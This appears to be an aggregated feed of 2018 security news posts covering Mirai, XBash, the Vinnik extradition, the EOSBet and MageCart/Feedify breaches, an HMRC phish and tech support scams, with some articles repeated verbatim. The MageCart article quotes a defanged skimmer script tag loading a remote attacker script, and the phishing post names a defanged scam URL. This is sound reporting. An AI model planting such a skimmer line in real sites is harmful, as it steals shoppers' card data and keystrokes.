On Tuesday, the DoJ revealed on Tuesday that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judges required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

mirai

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

” As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Mirai authors avoid the jail by helping US authorities in other investigations appeared first on Security Affairs.



Security Affairs

Kaspersky: Attacks on Smart Devices Rise Threefold in 2018

Attacks against smart devices are surging, with both old and new threats targeting connected devices that remain largely unsecured, according to researchers at Kaspersky Lab. Kaspersky researchers observed three times as many malware samples against smart devices in the first half of 2018 than they did in all of 2017, according to new findings...

Read the whole entry... »

Related Stories

Blog | Avast EN: The NUUO Peekaboo vulnerability gives hackers your camera feed | Avast

New vulnerabilities found in NUUO surveillance software can put cybercriminals in the director’s chair. When exploited through a stack buffer overflow, the Peekaboo vulnerability grants hackers full control over the surveillance video. Assuming control remotely, a hacker can tamper with the recording, tamper with the feed itself, and generally execute any code he or she wants in the software. This major security flaw is reportedly present in hundreds of thousands of devices around the world, such as the NUUO NVRMini2, a network-attached storage (NAS) device.



Blog | Avast EN

SecurityWeek RSS Feed: Symantec Launches Free Election Security Service

Symantec on Tuesday announced the launch of a new service that aims to make elections more secure by helping candidates and political organizations improve their security posture and detect fake websites.

read more



SecurityWeek RSS Feed

New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms

Palo Alto Network researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms

Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed XBash piece that is targeting both Linux and Microsoft Windows servers.

Xbash was developed using Python, then the authors converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution.

The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.

“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.

“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”

The malicious code was attributed to a popular crime gang tracked as the Iron Group.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

Now the experts from Palo Alto Networks discovered the new XBash malware strain that combines botnet, coinmining, ransomware, and self-propagation. The botnet and ransomware features are observed in infections of Linux systems, while a coinminer behavior was seen in infections of the Windows servers.

The Xbash authors have implemented scanning capabilities used by the malware to search for vulnerable servers online. The malicious code search for unpatched web applications that are vulnerable to a series of known exploits or to brute force attack with a dictionary of default credentials.

“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.

“Three known vulnerabilities are targeted:

  1. Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
  2. Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
  3. ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”

 

The malware can infect Windows systems, only after the compromise of a vulnerable Redis server.

The scanner component also scans the Internet for servers that run services that have been left online exposed without a password or are using weak credentials. The scanners target web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.

Hackers attempt to monetize their efforts through coin-mining activities on Windows systems or with ransomware based attacks on Linux servers running database services.

The XBash component will scan and delete MySQL, MongoDB, and PostgreSQL databases and drops a ransom asking for the payment of 0.02 Bitcoin ($125) to recover them.

Xbash

Unfortunately, victims will never recover their data because the malware wipe data and not back it up.

“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.

“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”

Experts noticed in all versions of Xbash the presence of a Python class named “LanScan” used to target enterprise networks.  The class allows to get local intranet information, generate a list of all IP addresses within the same subnet, and to perform port scanning to all these IPs

The code is still not active in the malware, likely crooks are working on its development.

Experts believe XBash will continue to evolve, for example including the miner component for Linux servers as well.

Further info, including IoCs, are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – malware, cybercrime)

The post New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms appeared first on Security Affairs.

Security Affairs: New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms

Palo Alto Network researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms

Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed XBash piece that is targeting both Linux and Microsoft Windows servers.

Xbash was developed using Python, then the authors converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution.

The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.

“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.

“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”

The malicious code was attributed to a popular crime gang tracked as the Iron Group.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

Now the experts from Palo Alto Networks discovered the new XBash malware strain that combines botnet, coinmining, ransomware, and self-propagation. The botnet and ransomware features are observed in infections of Linux systems, while a coinminer behavior was seen in infections of the Windows servers.

The Xbash authors have implemented scanning capabilities used by the malware to search for vulnerable servers online. The malicious code search for unpatched web applications that are vulnerable to a series of known exploits or to brute force attack with a dictionary of default credentials.

“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.

“Three known vulnerabilities are targeted:

  1. Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
  2. Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
  3. ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”

 

The malware can infect Windows systems, only after the compromise of a vulnerable Redis server.

The scanner component also scans the Internet for servers that run services that have been left online exposed without a password or are using weak credentials. The scanners target web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.

Hackers attempt to monetize their efforts through coin-mining activities on Windows systems or with ransomware based attacks on Linux servers running database services.

The XBash component will scan and delete MySQL, MongoDB, and PostgreSQL databases and drops a ransom asking for the payment of 0.02 Bitcoin ($125) to recover them.

Xbash

Unfortunately, victims will never recover their data because the malware wipe data and not back it up.

“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.

“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”

Experts noticed in all versions of Xbash the presence of a Python class named “LanScan” used to target enterprise networks.  The class allows to get local intranet information, generate a list of all IP addresses within the same subnet, and to perform port scanning to all these IPs

The code is still not active in the malware, likely crooks are working on its development.

Experts believe XBash will continue to evolve, for example including the miner component for Linux servers as well.

Further info, including IoCs, are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – malware, cybercrime)

The post New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms appeared first on Security Affairs.



Security Affairs

SecurityWeek RSS Feed: Altaba Settles Yahoo Breach Lawsuits for $47 Million

Altaba, the investment company that resulted from Verizon’s $4.5 billion acquisition of Yahoo’s Internet business last year, has agreed to settle consumer class action lawsuits triggered by the massive data breaches suffered by Yahoo in the past years.

read more



SecurityWeek RSS Feed

Security Affairs: Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, Supreme Civil and Criminal Court of Greece overruled previous ones.

The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, the decision has surprised the media because the man was expected to be extradited in the US or France as previously announces.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Russia, France, and the United States, where Vinnik is charged with different hacking crimes.

Greek Police have arrested the Russian national Alexander Vinnik (38) and they accuse the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted out to extradite Vinnink to the US  to face with the charges with the operation of an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused to be the responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country will look to a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”

AlexanderVinnik

The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overrun by the Greek Minister of Justice.

Pierluigi Paganini

(Security Affairs –  (Vinnik, BTC-e Bitcoin exchange)

The post Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia appeared first on Security Affairs.



Security Affairs

Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, Supreme Civil and Criminal Court of Greece overruled previous ones.

The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, the decision has surprised the media because the man was expected to be extradited in the US or France as previously announces.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Russia, France, and the United States, where Vinnik is charged with different hacking crimes.

Greek Police have arrested the Russian national Alexander Vinnik (38) and they accuse the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted out to extradite Vinnink to the US  to face with the charges with the operation of an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused to be the responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country will look to a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”

AlexanderVinnik

The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overrun by the Greek Minister of Justice.

Pierluigi Paganini

(Security Affairs –  (Vinnik, BTC-e Bitcoin exchange)

The post Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia appeared first on Security Affairs.

SecurityWeek RSS Feed: Wisconsin Officials Prepare for Potential Election Hackers

A private vendor inadvertently introduces malware into voting machines he is servicing. A hacker hijacks the cellular modem used to transmit unofficial Election Day results. An email address is compromised, giving bad actors the same access to voting software as a local elections official.

read more



SecurityWeek RSS Feed

HACKMAGEDDON: 16-31 August Cyber Attacks Timeline

Here we go with the second timeline of August covering the main cyber attacks occurred between August 16th and August 31st. A timeline apparently indicating that the malicious actors decided to end their summer break quite soon, as the number of recorded events is considerable higher that the first timeline.

HACKMAGEDDON

EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS

The gambling application EOSBet was affected by a vulnerability in its smart contract system that has been exploited by attackers to steal $200,000 worth of EOS.

The security breach was first reported by the member “thbourlove” of the EOSBet Reddit community that shared the code used to exploit the flaw.

After seeing the exploit code, the EOSBet’s official Reddit account admitted the hack.

“Yep, we were hacked. But we also have this exact assertion that you do. I would be careful, it’s a bit deeper than you think.” stated the EOSBet’s official Reddit account

EOSbet app

“A million-dollar EOS gambling dApp suffered a major blow, just days after declaring itself to be the safest of its kind.” reported The Next Web website.

“Hackers have taken 40,000 EOS ($200,000) from the operating wallet of EOSBet by exploiting vulnerabilities in its smart contracts”

The gambling application is based on the EOS blockchain, it was taken offline in response to the security breach.

“[…] A few hours ago, we were attacked, and about 40,000 EOS was taken from our bankroll,” said an EOSBet spokesperson.

“This bug was not minor as was stated previously, and we are still doing forensics and piecing together what happened.”

According to the company the attackers exploited a bug in one of their games, but it seems that the same issue could affect other games of the gambling platform.

The hackers were able to forge fake hash to hijack the EOSBet’s transfer funds.

The attackers have attempted to transfer funds to a wallet under their control that looks very similar to the one used by EOSBet.

The hackers only make a limited number of transactions from a number of accounts, they used the following message or similar as a description:

“Memo: Please refund the illegal income eos, otherwise we will hire a team of lawyers in China to pursue all criminal liability and losses to you. Eosbet official eos account: eosbetdicell.”

Then crooks distributed the gains splitting them across many wallets that received small amounts of EOS tokens with the following message:

“Memo: Dear players: In order to make up for the loss of eosbet players in the hacking incident, the platform launched a recharge to send BET. 1EOS=1BET, the official eos account: eosbetdicell, the transfer will automatically give the same BET.”

It is still unclear if this incident is connected to a suspect gambler win realized the last week, the player claimed over $600,000 from EOSBet by doubling their money repeatedly in 36 hours.

Platform managers excluded any link between the hack and what is considered a legitimate win.

Pierluigi Paganini

(Security Affairs – EOSBet, security breach)

The post EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS appeared first on Security Affairs.

Security Affairs: EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS

The gambling application EOSBet was affected by a vulnerability in its smart contract system that has been exploited by attackers to steal $200,000 worth of EOS.

The security breach was first reported by the member “thbourlove” of the EOSBet Reddit community that shared the code used to exploit the flaw.

After seeing the exploit code, the EOSBet’s official Reddit account admitted the hack.

“Yep, we were hacked. But we also have this exact assertion that you do. I would be careful, it’s a bit deeper than you think.” stated the EOSBet’s official Reddit account

EOSbet app

“A million-dollar EOS gambling dApp suffered a major blow, just days after declaring itself to be the safest of its kind.” reported The Next Web website.

“Hackers have taken 40,000 EOS ($200,000) from the operating wallet of EOSBet by exploiting vulnerabilities in its smart contracts”

The gambling application is based on the EOS blockchain, it was taken offline in response to the security breach.

“[…] A few hours ago, we were attacked, and about 40,000 EOS was taken from our bankroll,” said an EOSBet spokesperson.

“This bug was not minor as was stated previously, and we are still doing forensics and piecing together what happened.”

According to the company the attackers exploited a bug in one of their games, but it seems that the same issue could affect other games of the gambling platform.

The hackers were able to forge fake hash to hijack the EOSBet’s transfer funds.

The attackers have attempted to transfer funds to a wallet under their control that looks very similar to the one used by EOSBet.

The hackers only make a limited number of transactions from a number of accounts, they used the following message or similar as a description:

“Memo: Please refund the illegal income eos, otherwise we will hire a team of lawyers in China to pursue all criminal liability and losses to you. Eosbet official eos account: eosbetdicell.”

Then crooks distributed the gains splitting them across many wallets that received small amounts of EOS tokens with the following message:

“Memo: Dear players: In order to make up for the loss of eosbet players in the hacking incident, the platform launched a recharge to send BET. 1EOS=1BET, the official eos account: eosbetdicell, the transfer will automatically give the same BET.”

It is still unclear if this incident is connected to a suspect gambler win realized the last week, the player claimed over $600,000 from EOSBet by doubling their money repeatedly in 36 hours.

Platform managers excluded any link between the hack and what is considered a legitimate win.

Pierluigi Paganini

(Security Affairs – EOSBet, security breach)

The post EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS appeared first on Security Affairs.



Security Affairs

Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service.  The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

but apparently, the hackers re-infected the library.

The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.

Security Affairs: Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service.  The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

but apparently, the hackers re-infected the library.

The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.



Security Affairs

HMRC phish swipes email login, payment details

It’s not tax season in the UK, but that hasn’t deterred scammers from sending out mail looking to swipe both card details and email logins in one fell swoop.

The email, which claims UKGOV has issued a tax refund to the tune of 542.94 GBP, arrives under the following title, which is spectacularly poorly formatted:

[RCPT-07010144] processed your automatic payment is available – “Subscription- 10 SEPTEMBER 2018″[Email No.’6922′]

The body content states that recipients can reclaim the cash by logging in on their “gateway portal.” Better make haste though, as (in our case) the mail has a same day expiration date for the ability to put in a claim.

Fake email

Click to enlarge

Typically, we tend to see time limits of a few days on fake mails such as this one, so they’re really relying on pressure to get the job done here. We suspect anyone else receiving one of these will find themselves faced with a similarly pressing deadline.

Unlike many boilerplate tax phishes, we’re not sent directly to a fake HMRC page to enter card details.

With this scam, the first point of entry is on an imitation Outlook login, where potential victims are asked for their email address and password.

The scam site is located at:

onlinehmrevnue(dot)from-tx(dot)com/webGBTxid/checkValidation(dot)php

Fake HMRC phish login

Click to enlarge

Fake login

Click to enlarge

Once the email details have been harvested, they’re then taken to a rather threadbare HMRC phish. There are no splash screens or fake logins or anything remotely resembling the process of having to sign into the so-called gateway portal. Instead, it’s just a page full of boxes to be filled with name, address, city, phone number, DOB, mother’s maiden name, and then full credit card information, just to round things off.

HMRC phish card harvesting

Click to enlarge

The site performs a basic validation check on some of the information entered. The reason for this is so the scammers can be reasonably confident that the person on the other side of the screen entered accurate information. They also gain some (slight) protection from doing this; you can’t enter some fake details to waste the scammer’s time, because when you hit the credit card number section, it’ll probably just prevent you from going any further.

Validation check

Click to enlarge

You could probably still do it given enough time, but they’re likely banking on most people giving up and simply moving on instead. Make no mistake, a site such as the above is expressly geared toward nothing but the victim.

While these scams tend to experience a boom period during tax season (in this case, around April for the US and UK), there’s nothing preventing scammers from firing these out at other times of the year. In fact, it might be more of a benefit for them to do so. Recipients may be more likely to have their guard down due to the lack of “fake tax refund” articles making the rounds. Out of sight, out of mind and all that.

If you receive a mail similar to the above and you’re not sure if it’s real or not, the HMRC website has a number of pages giving advice on these specific situations. The main one to check out would be their phishes and frauds page, where you can see the type of correspondence they send out, and when they do (or don’t) send refund notices, as well as the method of said notification. They also provide some examples of phishing emails with their name on it.

One thing is for certain: You definitely won’t be sent from a HMRC refund email to an Outlook login. Don’t fall victim to a scam such as this, or you’ll have to chase down your bank and your email provider. If you have any logins tied to the compromised email account, you may have to play clean up for those, too.

Never underestimate how much trouble a fairly crude, simple phish can cause—it doesn’t take much to cause endless financial headaches and a large bundle of password resets.

The post HMRC phish swipes email login, payment details appeared first on Malwarebytes Labs.

Greek Supreme Court Approves Russian Request for Bitcoin Suspect

Greece's Supreme Court on Friday said a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency should be extradited to Russia, a court source said.

Alexander Vinnik, who headed bitcoin exchange BTC-e, has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki.

read more

Tech support scammers leverage “evil cursor” technique to “lock” Chrome

Tech scammers are constantly coming up with new techniques to make users panic and seek their bogus services. The latest one, documented by Malwarebytes researchers, has been dubbed “evil cursor”. “Evil cursor” The trick works against a recent version of Google Chrome (69.0.3497.81) and prevents the victims from closing a tab or browser window by clicking on the “X” in the upper right corner. The victims believe that they are pressing the “X”, but code … More

The post Tech support scammers leverage “evil cursor” technique to “lock” Chrome appeared first on Help Net Security.

North Korean hacker officially charged for the WannaCry attacks

Korean Hacker charged for WannaCry

Last month, we warned of the dangers that the FBI’s most wanted cybercriminals pose. Among these criminals are the perpetrator of the cyberattacks against HBO and the developer of the Zeus malware. And there is now a new name at the top of the list.

Park Jin Hyok, who has officially been charged by the US Department of Justice for carrying out the WannaCry attacks, among other cybercrimes.

According to the investigators, Park works for a company called Korean Expo Joint Venture, a front for the Korean government that, alongside illegal activities, also carries out legitimate software and IT support. Apart from working in this company, Park allegedly belongs to the hacking group known, among other names, as Lazarus Group – a group that has carried out numerous cyberattacks against South Korea.

One of the clues that helped track down Park was his use of free email services such as Gmail, which he used both for legitimate business at his company, and to carry out phishing attacks and other crimes.

As well as the criminal charges, the Treasury Department has announced that it will impose sanctions against Park and against the company. In a statement, it said, “North Korea has demonstrated a pattern of disruptive and harmful cyber activity that is inconsistent with the growing consensus on what constitutes responsible state behavior in cyberspace.”

While it is unlikely that Park will ever be handed over the the US authorities, according to Martyn Williams, a journalist specialized in North Korean affairs, it is a symbolic step from the American government: an official accusation against the North Korean government is a rare move.

A long criminal record

The most notorious cybercrime of which Park is accused is WannaCry, the 2017 global ransomware attack that affected computers in over 150 countries, and had an estimated cost of up to $4 billion worldwide.

Another accusation is that he was behind the 2014 hack of Sony Pictures. This attack was carried out using a piece of malware called Destover. During the incident, 100 terabytes of information was leaked, including personal emails, films, information about salaries, and scripts of future films.

Suspicions about this attack already fell on North Korea at the time, due in part to the fact that one of the attackers’ demands was the withdrawal of the film ‘The Interview’, in which two journalists attempt to assassinate the North Korean leader, Kim Jong Un.

Along with these cyberattacks, he is also accused of being involved in the 2016 robbery of the Bangladesh Central Bank. Using sophisticated malware to have visibility of the IT system, the attackers were able to observe how the bank’s operations worked. With this information, they carried out fraudulent transactions worth $850 million dollars. According to the FBI report, the malware could have got onto the system using a version of the BEC scam [p. 58 of the report].

Although the bank was able to recover a large part of the money –  it is estimated that the bank’s total loss was around $81 million – it was still one of the largest thefts of this type in history.

How to keep your company safe from the most wanted cybercriminals

One of the main reasons to hire a cybersecurity solution for your company is to gain time: having the right tools to be able to react immediately to a cyberattack can make the difference between being a victim and staying safe.

One way to do so is to have a cybersecurity suite that provides an active search for threats. This way, the company can stay ahead of cybercriminals and react before an attack takes place. This is exactly what Panda Adaptive Defense 360’s Threat Hunting service does.

This managed service from Panda provides visibility of all activity on the corporate network, so that you know exactly what is happening at all times. Adaptive Defense 360 classifies 99.98% of processes via machine learning, and the remaining 0.02% are classified by Panda’s expert cybersecurity analysts. Advanced technologies like this allowed Panda to protect all clients with Adaptive Defense installed in Lock mode from WannaCry. It is an advanced cybersecurity solution that is still protecting the endpoints of companies all over the world.

The post North Korean hacker officially charged for the WannaCry attacks appeared first on Panda Security Mediacenter.

Partnerstroka: Large tech support scam operation features latest browser locker

Tech support scams continue to be one of the top consumer threats in 2018, despite actions from security vendors and law enforcement. Scammers are constantly looking for new ways to reel in more victims, going beyond cold calls impersonating Microsoft to rogue tech support ads using the good name of legitimate brands, and of course, malicious pop-ups.

We have been monitoring a particular tech support scam campaign for some time which, like several others, relies on malvertising to redirect users to the well-known browser lockers (browlocks) pages. While it is common for crooks in this industry to reuse design templates, we were still able to isolate incidents pertaining to this group which we have been tracking under the name Partnerstroka.

However we caught up with the same campaign again recently and noticed that the fake alert pages contained what seemed to be a new browlock technique designed specifically for Google Chrome. In this blog post, we share some of our findings on this group and their latest techniques.

Identification

The browser locker is typical of those we normally see, but the crooks have ensured that most browsers and operating systems are covered with their own landing page. This is determined by looking at the user-agent string when the client requests the page to the malicious server. It is further customized via JavaScript functions that perform the “locking” part of the scam.

Different templates for the same browlock domain

The name we track this campaign under is inspired by the string “stroka” found within the HTML source code. That same string (and similar code) was also present in previous JavaScript-based “Police Browlocks” that required users to pay a fine with vouchers. However, because code reuse is common among scammers, it is likely to be an entirely different group.

Campaign identification via redirects, TLD and registrar

